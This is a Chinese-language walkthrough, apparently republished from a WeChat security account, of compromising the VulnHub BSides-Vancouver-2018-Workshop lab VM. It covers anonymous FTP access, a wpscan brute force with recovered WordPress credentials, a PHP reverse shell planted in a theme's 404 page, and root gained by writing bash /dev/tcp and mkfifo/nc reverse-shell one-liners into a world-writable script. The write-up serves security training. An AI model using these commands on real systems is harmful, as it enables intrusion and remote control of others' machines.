留不住了,就舍得了
下载地址:https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova
难度:相对简单,有很多种方法
主机发现
端口扫描
利用ftp的默认用户进行匿名登录,查看文件
ftp 192.168.209.136
cd public
get users.txt.bk
像是一个密码字典(其实是一个用户字典,当前系统用户包含了这些用户)
目录扫描
robots.txt爬虫协议
一个wordpress站点
继续目录扫描
利用wpscan发现可能存在的用户名,并使用msf的字典
wpscan --url http://192.168.209.136/backup_wordpress -e u -P /usr/share/wordlists/metasploit/burnett_top_1024.txt
有俩个用户分别是john和admin,以及john的密码enigma
登录进去直接修改404反弹shell的php脚本(kali自带/usr/share/webshells/php/php-reverse-shell.php)
kali开启监听
反弹成功
创建交互式终端
python -c "import pty; pty.spawn('/bin/bash')"
基本信息收集,Ubuntu 12.04.4 LTS ,3.11.0-15没有内核提权漏洞,在往期的靶机中
我们查看数据库密码(站点用到的就是mysql肯定存在mysql服务),thiscannotbeit
登录成功
查看用户表
使用hash-identifier hash识别工具,识别hash类型
md5解密
切换思路,继续信息收集,查看文件权限为777的文件
find / -perm 777 -type f 2>/dev/null
那么就可以直接反弹shell提权
echo '/bin/bash -i >& /dev/tcp/192.168.209.130/6666 0>&1' > cleanup
./cleanup
kali端是有反应的,自动退出了
换一个反弹shell命令
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.209.130 6666 >/tmp/f' > cleanup
./cleanup
往期推荐
【oscp】pWnOS系列全教程,Webmin文件披露,Simple PHP Blog渗透教程
原文始发于微信公众号(泷羽Sec):【oscp】BSides-Vancouver-2018-Workshop,ftp匿名登录,wordpress渗透
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论